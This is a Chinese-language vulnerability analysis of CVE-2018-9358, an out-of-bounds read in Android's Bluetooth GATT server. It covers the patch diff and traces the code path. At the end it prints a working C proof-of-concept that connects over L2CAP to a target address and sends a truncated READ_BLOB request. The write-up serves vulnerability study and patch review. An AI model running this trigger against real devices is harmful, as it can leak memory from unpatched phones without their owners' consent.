【蓝牙】CVE-2018-9358 信息泄露

补丁

https://android.googlesource.com/platform/system/bt/+/0d7c2f5a14d1055f3b4f69035451c66bf8f1b08e

补丁里补了两个函数：gatt_process_exec_write_req()和gatts_process_read_req()

DO NOT MERGE Handle bad packet length in gatts_process_read_req

Added error check and handling code in gatts_process_read_req to
make sure that the packet length is correct.
Please note that there is another earlier CL that is reverted and this
is the updated one.

Bug: 73172115
Test: Run the test program, poc, that was attached in the bug report
Merged-In: Ia9b4e502fa8f8384bf9767e68f73b48a0915141b
Change-Id: Ia9b4e502fa8f8384bf9767e68f73b48a0915141b
(cherry picked from commit cc9c7330d1c3507d745170ae7b2e0546197b7acb)
(cherry picked from commit 16f4c21be5bd0ea1968eee8a0f00648b1e326253)
diff --git a/stack/gatt/gatt_sr.cc b/stack/gatt/gatt_sr.cc
index 3af9866..06c9c52 100644
--- a/stack/gatt/gatt_sr.cc
+++ b/stack/gatt/gatt_sr.cc
@@ -22,6 +22,7 @@
  *
  ******************************************************************************/
 
+#include <log/log.h>
 #include "bt_target.h"
 #include "bt_utils.h"
 #include "osi/include/osi.h"
@@ -281,8 +282,8 @@
  * Returns          void
  *
  ******************************************************************************/
-void gatt_process_exec_write_req(tGATT_TCB& tcb, uint8_t op_code,
-                                 UNUSED_ATTR uint16_t len, uint8_t* p_data) {
+void gatt_process_exec_write_req(tGATT_TCB& tcb, uint8_t op_code, uint16_t len,
+                                 uint8_t* p_data) {
   uint8_t *p = p_data, flag, i = 0;
   uint32_t trans_id = 0;
   tGATT_IF gatt_if;
@@ -301,6 +302,13 @@
   }
 #endif
 
+  if (len < sizeof(flag)) {
+    android_errorWriteLog(0x534e4554, "73172115");
+    LOG(ERROR) << __func__ << "invalid length";
+    gatt_send_error_rsp(tcb, GATT_INVALID_PDU, GATT_REQ_EXEC_WRITE, 0, false);
+    return;
+  }
+
   STREAM_TO_UINT8(flag, p);
 
   /* mask the flag */
@@ -940,9 +948,19 @@
  */
 static void gatts_process_read_req(tGATT_TCB& tcb, tGATT_SRV_LIST_ELEM& el,
                                    uint8_t op_code, uint16_t handle,
-                                   UNUSED_ATTR uint16_t len, uint8_t* p_data) {
+                                   uint16_t len, uint8_t* p_data) {
   size_t buf_len = sizeof(BT_HDR) + tcb.payload_size + L2CAP_MIN_OFFSET;
   uint16_t offset = 0;
+
+  if (op_code == GATT_REQ_READ_BLOB && len < sizeof(uint16_t)) {
+    /* Error: packet length is too short */
+    LOG(ERROR) << __func__ << ": packet length=" << len
+               << " too short. min=" << sizeof(uint16_t);
+    android_errorWriteWithInfoLog(0x534e4554, "73172115", -1, NULL, 0);
+    gatt_send_error_rsp(tcb, GATT_INVALID_PDU, op_code, 0, false);
+    return;
+  }
+
   BT_HDR* p_msg = (BT_HDR*)osi_calloc(buf_len);
 
   if (op_code == GATT_REQ_READ_BLOB) STREAM_TO_UINT16(offset, p_data);
@@ -964,7 +982,7 @@
   if (reason != GATT_SUCCESS) {
     osi_free(p_msg);
 
-    /* in theroy BUSY is not possible(should already been checked), protected
+    /* in theory BUSY is not possible(should already been checked), protected
      * check */
     if (reason != GATT_PENDING && reason != GATT_BUSY)
       gatt_send_error_rsp(tcb, reason, op_code, handle, false);

我们先来看gatt_process_exec_write_req()，先从变量p取1个字节，变量p来自参数p_data，我们找到上层函数判断参数是什么数据传入的

/*******************************************************************************
 *
 * Function         gatt_process_exec_write_req
 *
 * Description      This function is called to process the execute write request
 *                  from client.
 *
 * Returns          void
 *
 ******************************************************************************/
void gatt_process_exec_write_req(tGATT_TCB& tcb, uint8_t op_code,
                                 UNUSED_ATTR uint16_t len, uint8_t* p_data) {
    uint8_t *p = p_data, flag, i = 0;
    uint32_t trans_id = 0;
    tGATT_IF gatt_if;
    uint16_t conn_id;

    ...
    
    STREAM_TO_UINT8(flag, p); // 获取1个字节

    /* mask the flag */
    flag &= GATT_PREP_WRITE_EXEC;

    /* no prep write is queued */
    if (!gatt_sr_is_prep_cnt_zero(tcb)) {
        trans_id = gatt_sr_enqueue_cmd(tcb, op_code, 0);
        gatt_sr_copy_prep_cnt_to_cback_cnt(tcb);

        for (i = 0; i < GATT_MAX_APPS; i++) {
            if (tcb.prep_cnt[i]) {
                gatt_if = (tGATT_IF)(i + 1);
                conn_id = GATT_CREATE_CONN_ID(tcb.tcb_idx, gatt_if);
                tGATTS_DATA gatts_data;
                gatts_data.exec_write = flag; // 将读出的1字节赋值给gatts_data.exec_write
                gatt_sr_send_req_callback(conn_id, trans_id, GATTS_REQ_TYPE_WRITE_EXEC, &gatts_data);  // 发送回去
                tcb.prep_cnt[i] = 0;
            }
        }
    } else /* nothing needs to be executed , send response now */
    {
        LOG(ERROR) << "gatt_process_exec_write_req: no prepare write pending";
        gatt_send_error_rsp(tcb, GATT_ERROR, GATT_REQ_EXEC_WRITE, 0, false);
    }
}

len和p_data来自上层

/** This function is called to handle the client requests to server */
void gatt_server_handle_client_req(tGATT_TCB& tcb, uint8_t op_code,
                                   uint16_t len, uint8_t* p_data) {
    ...
    if (len >= tcb.payload_size) {
        ... // 错误处理
    } else {
        switch (op_code) {
            ...
            case GATT_REQ_EXEC_WRITE:
                gatt_process_exec_write_req(tcb, op_code, len, p_data);
                break;
            ...
        }
    }
}

再往上找，可以看到msg_len和p分别对应着Buffer剩余长度和Buffer指针

void gatt_data_process(tGATT_TCB& tcb, BT_HDR* p_buf) {
    uint8_t* p = (uint8_t*)(p_buf + 1) + p_buf->offset;

    uint16_t msg_len = p_buf->len - 1;
    STREAM_TO_UINT8(op_code, p);

    if (op_code == GATT_SIGN_CMD_WRITE) {
        gatt_verify_signature(tcb, p_buf);
    } else {
        /* message from client */
        if ((op_code % 2) == 0)
            gatt_server_handle_client_req(tcb, op_code, msg_len, p);
        else
            gatt_client_handle_server_rsp(tcb, op_code, msg_len, p);
    }
}

所以再回到gatt_process_exec_write_req，在调用STREAM_TO_UINT8()进行取值的时候，未判断p指向的数据是否处于Buffer边界之内，读出的数据做一次&运算后赋值给gatts_data.exec_write，再调用gatt_sr_send_req_callback()发送回去，造成信息泄露

void gatt_process_exec_write_req(tGATT_TCB& tcb, uint8_t op_code,
                                 UNUSED_ATTR uint16_t len, uint8_t* p_data) {
    uint8_t *p = p_data, flag, i = 0;
    ...
    STREAM_TO_UINT8(flag, p); // 获取1个字节
    flag &= GATT_PREP_WRITE_EXEC;
    if (!gatt_sr_is_prep_cnt_zero(tcb)) {
        ...
        for (i = 0; i < GATT_MAX_APPS; i++) {
            if (tcb.prep_cnt[i]) {
                ...
                gatts_data.exec_write = flag; // 将读出的1字节赋值给gatts_data.exec_write
                gatt_sr_send_req_callback(conn_id, trans_id, GATTS_REQ_TYPE_WRITE_EXEC, &gatts_data);  // 发送回去
                ...
            }
        }
    } 
    ...
}

gatt_sr_send_req_callback()调用(*p_reg->app_cb.p_req_cb)()，这是函数指针调用

/*******************************************************************************
 *
 * Function         gatt_sr_send_req_callback
 *
 * Description
 *
 *
 * Returns          void
 *
 ******************************************************************************/
void gatt_sr_send_req_callback(uint16_t conn_id, uint32_t trans_id, tGATTS_REQ_TYPE type, tGATTS_DATA* p_data) {
    tGATT_IF gatt_if = GATT_GET_GATT_IF(conn_id);
    tGATT_REG* p_reg = gatt_get_regcb(gatt_if);

    if (!p_reg) {
        LOG(ERROR) << "p_reg not found discard request";
        return;
    }

    if (p_reg->in_use && p_reg->app_cb.p_req_cb) {
        (*p_reg->app_cb.p_req_cb)(conn_id, trans_id, type, p_data); // <--
    } else {
        LOG(WARNING) << "Call back not found for application conn_id=" << conn_id;
    }
}

找到定义的结构体，我们可以看到p_req_cb是第五个

typedef struct {
    tGATT_CONN_CBACK* p_conn_cb;
    tGATT_CMPL_CBACK* p_cmpl_cb;
    tGATT_DISC_RES_CB* p_disc_res_cb;
    tGATT_DISC_CMPL_CB* p_disc_cmpl_cb;
    tGATT_REQ_CBACK* p_req_cb;
    tGATT_ENC_CMPL_CB* p_enc_cmpl_cb;
    tGATT_CONGESTION_CBACK* p_congestion_cb;
    tGATT_PHY_UPDATE_CB* p_phy_update_cb;
    tGATT_CONN_UPDATE_CB* p_conn_update_cb;
} tGATT_CBACK;

搜索对该结构体进行赋值的全局操作，幸运的找到了，第五个字段就是bta_gatts_send_request_cback()

static void bta_gatts_send_request_cback(uint16_t conn_id, uint32_t trans_id,
                                         tGATTS_REQ_TYPE req_type,
                                         tGATTS_DATA* p_data);

static tGATT_CBACK bta_gatts_cback = {bta_gatts_conn_cback,
                                      NULL,
                                      NULL,
                                      NULL,
                                      bta_gatts_send_request_cback,
                                      NULL,
                                      bta_gatts_cong_cback,
                                      bta_gatts_phy_update_cback,
                                      bta_gatts_conn_update_cback};

有趣的是bta_gatts_send_request_cback()又调用了(*p_rcb->p_cback)()

/*******************************************************************************
 *
 * Function         bta_gatts_request_cback
 *
 * Description      GATTS attribute request callback.
 *
 * Returns          none.
 *
 ******************************************************************************/
static void bta_gatts_send_request_cback(uint16_t conn_id, uint32_t trans_id, tGATTS_REQ_TYPE req_type, tGATTS_DATA* p_data) {
    tBTA_GATTS cb_data;
    tBTA_GATTS_RCB* p_rcb;
    tGATT_IF gatt_if;
    tBTA_GATT_TRANSPORT transport;

    memset(&cb_data, 0, sizeof(tBTA_GATTS));

    if (GATT_GetConnectionInfor(conn_id, &gatt_if, cb_data.req_data.remote_bda, &transport)) {
        p_rcb = bta_gatts_find_app_rcb_by_app_if(gatt_if);

        APPL_TRACE_DEBUG("%s: conn_id=%d trans_id=%d req_type=%d", __func__, conn_id, trans_id, req_type);

        if (p_rcb && p_rcb->p_cback) {
            /* if over BR_EDR, inform PM for mode change */
            if (transport == BTA_TRANSPORT_BR_EDR) {
                bta_sys_busy(BTA_ID_GATTS, BTA_ALL_APP_ID, cb_data.req_data.remote_bda);
                bta_sys_idle(BTA_ID_GATTS, BTA_ALL_APP_ID, cb_data.req_data.remote_bda);
            }

            cb_data.req_data.conn_id = conn_id;
            cb_data.req_data.trans_id = trans_id;
            cb_data.req_data.p_data = (tBTA_GATTS_REQ_DATA*)p_data;

            (*p_rcb->p_cback)(req_type, &cb_data); // <--
        } else {
            APPL_TRACE_ERROR("connection request on gatt_if[%d] is not interested", gatt_if);
        }
    } else {
        APPL_TRACE_ERROR("request received on unknown connectino ID: %d", conn_id);
    }
}

继续找结构体，这个结构体的赋值最终没有找到

/* application registration control block */
typedef struct {
    bool in_use;
    tBT_UUID app_uuid;
    tBTA_GATTS_CBACK* p_cback;
    tBTA_GATTS_IF gatt_if;
} tBTA_GATTS_RCB;

于是我想，函数(*p_rcb->p_cback)(req_type, &cb_data)的参数类型或许有希望

(*p_rcb->p_cback)(tGATTS_REQ_TYPE, tBTA_GATTS*)
typedef uint8_t tGATTS_REQ_TYPE;

最后找到一个

typedef uint8_t tBTA_GATTS_EVT;

static void btapp_gatts_cback(tBTA_GATTS_EVT event, tBTA_GATTS* p_data) {
  bt_status_t status;
  status = btif_transfer_context(btapp_gatts_handle_cback, (uint16_t)event,
                                 (char*)p_data, sizeof(tBTA_GATTS),
                                 btapp_gatts_copy_req_data);
  ASSERTC(status == BT_STATUS_SUCCESS, "Context transfer failed!", status);
}

#define BTA_GATTS_EXEC_WRITE_EVT GATTS_REQ_TYPE_WRITE_EXEC             /* 5 */

第二处补丁对Buffer剩余长度做了判断，后面取了2字节的数据，所以需要判断Buffer剩余长度要大于等于2字节

@@ -940,9 +948,19 @@
  */
 static void gatts_process_read_req(tGATT_TCB& tcb, tGATT_SRV_LIST_ELEM& el,
                                    uint8_t op_code, uint16_t handle,
-                                   UNUSED_ATTR uint16_t len, uint8_t* p_data) {
+                                   uint16_t len, uint8_t* p_data) {
   size_t buf_len = sizeof(BT_HDR) + tcb.payload_size + L2CAP_MIN_OFFSET;
   uint16_t offset = 0;
+
+  if (op_code == GATT_REQ_READ_BLOB && len < sizeof(uint16_t)) {
+    /* Error: packet length is too short */
+    LOG(ERROR) << __func__ << ": packet length=" << len
+               << " too short. min=" << sizeof(uint16_t);
+    android_errorWriteWithInfoLog(0x534e4554, "73172115", -1, NULL, 0);
+    gatt_send_error_rsp(tcb, GATT_INVALID_PDU, op_code, 0, false);
+    return;
+  }
+
   BT_HDR* p_msg = (BT_HDR*)osi_calloc(buf_len);
 
   if (op_code == GATT_REQ_READ_BLOB) STREAM_TO_UINT16(offset, p_data);
@@ -964,7 +982,7 @@
   if (reason != GATT_SUCCESS) {
     osi_free(p_msg);

获取的数据offset只传入了gatts_read_attr_value_by_handle()，且后续没有使用到，所以我们需要关注gatts_read_attr_value_by_handle()里对offset的操作

/**
 * This function is called to process the read request from client.
 */
static void gatts_process_read_req(tGATT_TCB& tcb, tGATT_SRV_LIST_ELEM& el,
                                   uint8_t op_code, uint16_t handle,
                                   UNUSED_ATTR uint16_t len, uint8_t* p_data) {
    size_t buf_len = sizeof(BT_HDR) + tcb.payload_size + L2CAP_MIN_OFFSET;
    uint16_t offset = 0;
    BT_HDR* p_msg = (BT_HDR*)osi_calloc(buf_len);

    // 此处直接对p_data取2字节的数据
    if (op_code == GATT_REQ_READ_BLOB) STREAM_TO_UINT16(offset, p_data);

    uint8_t* p = (uint8_t*)(p_msg + 1) + L2CAP_MIN_OFFSET;
    *p++ = op_code + 1;
    p_msg->len = 1;
    buf_len = tcb.payload_size - 1;

    uint8_t sec_flag, key_size;
    gatt_sr_get_sec_info(tcb.peer_bda, tcb.transport, &sec_flag, &key_size);

    uint16_t value_len = 0;
    // 读取的offset传入gatts_read_attr_value_by_handle()
    tGATT_STATUS reason = gatts_read_attr_value_by_handle(
        tcb, el.p_db, op_code, handle, offset, p, &value_len, (uint16_t)buf_len, 
        sec_flag, key_size, 0);
    p_msg->len += value_len;

    if (reason != GATT_SUCCESS) {
        osi_free(p_msg);

        /* in theroy BUSY is not possible(should already been checked), protected
         * check */
        if (reason != GATT_PENDING && reason != GATT_BUSY)
            gatt_send_error_rsp(tcb, reason, op_code, handle, false);

        return;
    }

    attp_send_sr_msg(tcb, p_msg); 
}

通过对gatts_read_attr_value_by_handle()进行分析，正常情况下返回的是GATT_SUCCESS，我们并不关心返回值，所以这里略过，其中会调用两个函数：read_attr_value()和gatts_send_app_read_request()

/*******************************************************************************
 *
 * Function         gatts_read_attr_value_by_handle
 *
 * Description      Query attribute value by attribute handle.
 *
 * Parameter        p_db: pointer to the attribute database.
 *                  handle: Attribute handle to read.
 *                  offset: Read offset.
 *                  p_value: output parameter to carry out the attribute value.
 *                  p_len: output parameter as attribute length read.
 *                  read_long: this is a read blob request.
 *                  mtu: MTU.
 *                  sec_flag: current link security status.
 *                  key_size: encryption key size
 *
 * Returns          Status of operation.
 *
 ******************************************************************************/
tGATT_STATUS gatts_read_attr_value_by_handle(
        tGATT_TCB& tcb, tGATT_SVC_DB* p_db, uint8_t op_code, uint16_t handle,
        uint16_t offset, uint8_t* p_value, uint16_t* p_len, uint16_t mtu,
        tGATT_SEC_FLAG sec_flag, uint8_t key_size, uint32_t trans_id) {
    tGATT_ATTR* p_attr = find_attr_by_handle(p_db, handle);
    if (!p_attr) return GATT_NOT_FOUND;

    uint8_t* pp = p_value;
    tGATT_STATUS status = read_attr_value(*p_attr, offset, &pp,
                                            (bool)(op_code == GATT_REQ_READ_BLOB),
                                            mtu, p_len, sec_flag, key_size);

    if (status == GATT_PENDING) {
        status = gatts_send_app_read_request(tcb, op_code, p_attr->handle, offset, trans_id, p_attr->gatt_type);
    }
    return status;
}

read_attr_value()调用gatts_check_attr_readability()，然而gatts_check_attr_readability()没有使用到offset

static tGATT_STATUS read_attr_value(tGATT_ATTR& attr16, uint16_t offset,
                                    uint8_t** p_data, bool read_long,
                                    uint16_t mtu, uint16_t* p_len,
                                    tGATT_SEC_FLAG sec_flag, uint8_t key_size) {
    ...
    tGATT_STATUS status = gatts_check_attr_readability(attr16, offset, read_long, sec_flag, key_size);
    ...
}

static tGATT_STATUS gatts_check_attr_readability(const tGATT_ATTR& attr,
                                                 UNUSED_ATTR uint16_t offset,
                                                 bool read_long,
                                                 tGATT_SEC_FLAG sec_flag,
                                                 uint8_t key_size) {

来看另一个函数gatts_send_app_read_request()，该函数将offset赋值给sr_data.read_req.offset，最后调用gatt_sr_send_req_callback()

/*******************************************************************************
 *
 * Function         gatts_send_app_read_request
 *
 * Description      Send application read request callback
 *
 * Returns          status of operation.
 *
 ******************************************************************************/
static tGATT_STATUS gatts_send_app_read_request(
        tGATT_TCB& tcb, uint8_t op_code, uint16_t handle, uint16_t offset,
        uint32_t trans_id, bt_gatt_db_attribute_type_t gatt_type) {
    tGATT_SRV_LIST_ELEM& el = *gatt_sr_find_i_rcb_by_handle(handle);
    uint16_t conn_id = GATT_CREATE_CONN_ID(tcb.tcb_idx, el.gatt_if);

    if (trans_id == 0) {
        trans_id = gatt_sr_enqueue_cmd(tcb, op_code, handle);
        gatt_sr_update_cback_cnt(tcb, el.gatt_if, true, true);
    }

    if (trans_id != 0) {
        tGATTS_DATA sr_data;
        memset(&sr_data, 0, sizeof(tGATTS_DATA));

        sr_data.read_req.handle = handle;
        sr_data.read_req.is_long = (bool)(op_code == GATT_REQ_READ_BLOB);
        sr_data.read_req.offset = offset; // <--

        uint8_t opcode;
        if (gatt_type == BTGATT_DB_DESCRIPTOR) {
            opcode = GATTS_REQ_TYPE_READ_DESCRIPTOR;
        } else if (gatt_type == BTGATT_DB_CHARACTERISTIC) {
            opcode = GATTS_REQ_TYPE_READ_CHARACTERISTIC;
        } else {
            LOG(ERROR) << __func__
                        << ": Attempt to read attribute that's not tied with "
                            "characteristic or descriptor value.";
            return GATT_ERROR;
        }

        gatt_sr_send_req_callback(conn_id, trans_id, opcode, &sr_data); // <--
        return (tGATT_STATUS)GATT_PENDING;
    } else
        return (tGATT_STATUS)GATT_BUSY; /* max pending command, application error */
}

所以问题来了：gatt_sr_send_req_callback()到底在做什么？

PoC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>          
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/l2cap.h>

#define BT_PSM_GATT 31

#define GATT_REQ_READ_BLOB   0x0C

#define UINT8_TO_STREAM(p, u8)     \
{                                  \
    *(p)++ = u8;                   \
}

#define UINT16_TO_STREAM(p, u16)   \
{                                  \
  *(p)++ = (uint8_t)(u16);         \
  *(p)++ = (uint8_t)((u16) >> 8);  \
}

#define GATT_BLD_OPCODE(p, opcode) \
do{                                \
    *(p)++ = opcode;               \
}while(0)

void send_trigger_req(int sock_fd)
{
    uint8_t buffer[1024];
    memset(buffer, 0, 1024);

    uint8_t *p = buffer;
    GATT_BLD_OPCODE(p, GATT_REQ_READ_BLOB);
        
    uint16_t handle = 0x0001;
    UINT16_TO_STREAM(p, handle);

    // without handle here, to make oob read.

    send(sock_fd, buffer, p - buffer, 0);
}

int main(int argc ,char* argv[])
{
    int sock_fd, ret;
    int try_count = 1;
    char dest[18];
    struct sockaddr_l2 local_l2_addr;
    struct sockaddr_l2 remote_l2_addr;

    if(argc < 2)
    {
        printf("usage : sudo ./poc TARGET_ADDR\n");
        return -1;
    }
    strncpy(dest, argv[1], 18);

    while( try_count-- > 0 )
    {
        sock_fd = socket(PF_BLUETOOTH, SOCK_STREAM, BTPROTO_L2CAP);
        if(sock_fd == -1)
        {
            perror("[*] socket create failed : ");
            return -1;
        }

        memset(&local_l2_addr, 0, sizeof(struct sockaddr_l2));
        local_l2_addr.l2_family = PF_BLUETOOTH;
        memcpy(&local_l2_addr.l2_bdaddr , BDADDR_ANY, sizeof(bdaddr_t));


        ret = bind(sock_fd, (struct sockaddr*) &local_l2_addr, sizeof(struct sockaddr_l2));
        if(ret == -1)
        {
            perror("[*] bind()");
            goto out;
        }

        // l2cap_set_mtu(sock_fd, 1024, 1024);

        memset(&remote_l2_addr, 0, sizeof(remote_l2_addr));
        remote_l2_addr.l2_family = PF_BLUETOOTH;
        remote_l2_addr.l2_psm = htobs(BT_PSM_GATT);
        str2ba(dest, &remote_l2_addr.l2_bdaddr);

        if(connect(sock_fd, (struct sockaddr *) &remote_l2_addr,sizeof(remote_l2_addr)) < 0) 
        {  
            perror("[*] can't connect");
            // if(errno == 100)
            //     goto vul;
            goto out;
        } 

        send_trigger_req(sock_fd);
        sleep(1);
    }

out:
    close(sock_fd);
    return 0;
}

Previous【蓝牙】CVE-2018-9357 BNEP_Write越界写导致RCE Next【蓝牙】CVE-2018-9359 process_l2cap_cmd_L2CAP_CMD_INFO_REQ未判断缓冲区边界造成信息泄露

Last updated 2 years ago